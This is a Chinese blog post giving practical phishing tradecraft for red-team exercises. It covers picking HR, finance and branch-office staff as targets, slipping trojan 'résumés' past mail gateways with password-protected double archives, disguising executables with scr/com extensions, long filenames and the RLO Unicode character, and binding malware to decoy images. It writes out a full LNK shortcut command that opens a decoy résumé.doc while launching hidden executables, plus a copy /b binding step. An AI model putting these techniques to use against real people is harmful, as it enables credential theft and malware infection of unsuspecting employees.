点击上方「蓝字」,关注我们
钓鱼是攻防对抗中一种常用的手段,攻击者通常伪装成可信任的实体,例如合法的机构、公司或个人,以引诱受害者揭示敏感信息或执行恶意操作,能快速地撕破目标的伤口,快速进内网进行刷分。
01
一般来说,企业邮箱都存在邮件网关,邮件投递容易被退信拦截,所以我们要选择私人邮箱或不被邮服拦截的邮箱。
例如:在攻防中的目标有xx企业,可以搜site:“xx企业招聘”
02
● 首先是目标选择,目标群体:hr、经理、财务 等安全意识薄弱的人优先选择,提前准备多套场景应对
● 选择目标公司分部进行钓鱼成功率较高,提前想好话术和应变对策,避免被识破,最好不要在总部,避开IT信息安全部
● 社交恐怖分子的师傅可以尝试电话钓鱼,获取信任再添加微信发送木马
邮件钓鱼
● 群发邮件(易被管理员发现或被邮件网关拦截)
● 搜集关键人物个人邮箱定向投递(隐蔽性强)
例如:紧贴时事话题,以及各种福利活动将钓鱼链接转为二维码诱惑钓鱼对象点击
招聘投递简历,hr面对大量投递的简历不会很细致去查看后缀
03
●木马需要打压缩,添加密码并隐藏内容,或对木马文件进行双重压缩,一定程度绕过邮件网关的检测
●选择不常见的后缀但仍可作为exe执行,如scr、com、msc、cmd等
●文件名使用长命名,如果对方文件显示设置不当,预览时候看不到后缀
如果得知目标单位使用的不是360这类杀软,可使用lnk文件进行钓鱼(360会拦截)
快捷方式目标位置填入:
%windir%\system32\cmd.exe /c start .\.__MACOS__\.__MACOS__\.__MACOS__\.__MACOS1__\简历.doc && C:\Windows\exp.exe ".\.__MACOS__\.__MACOS__\.__MACOS__\.__MACOS1__\简历.exe"
将简历.doc.lnk与真实的doc文档捆绑,使其文件大小看起来更具有迷惑性(copy /b 简历.doc.lnk + 简历.doc 简历.doc2.lnk)。
· 绑定正常文件和恶意木马,运行后会对exe本身进行自删除,然后在当前目录下释放正常文件并打开。
免杀的捆绑bili.exe文件还是没有任何图标的,比较原始,隐蔽性不高。我们可用别的方法将捆绑的文件改为png或jpg等图片文件,然后最后实现的效果就是打开一个正常图片的同时上线该主机。
使用RLO改个后缀
打开一个记事本,输入你原本文件名;本文着输入al。
接着,右键选择"插入Unicode控制字符",再选择"RLO"模式。
接着,只看着键盘输入gpj.exe。下面就是拼接后的效果。
我们使用Ctrl+A全选这段字符串进行复制。接着选中有图标的免杀的捆绑al.exe文件,选择重命名,然后全选文件名al.exe,接着选择"粘贴"。效果如下:
这样看起来就像样的多了。
扫描右侧二维码关注我们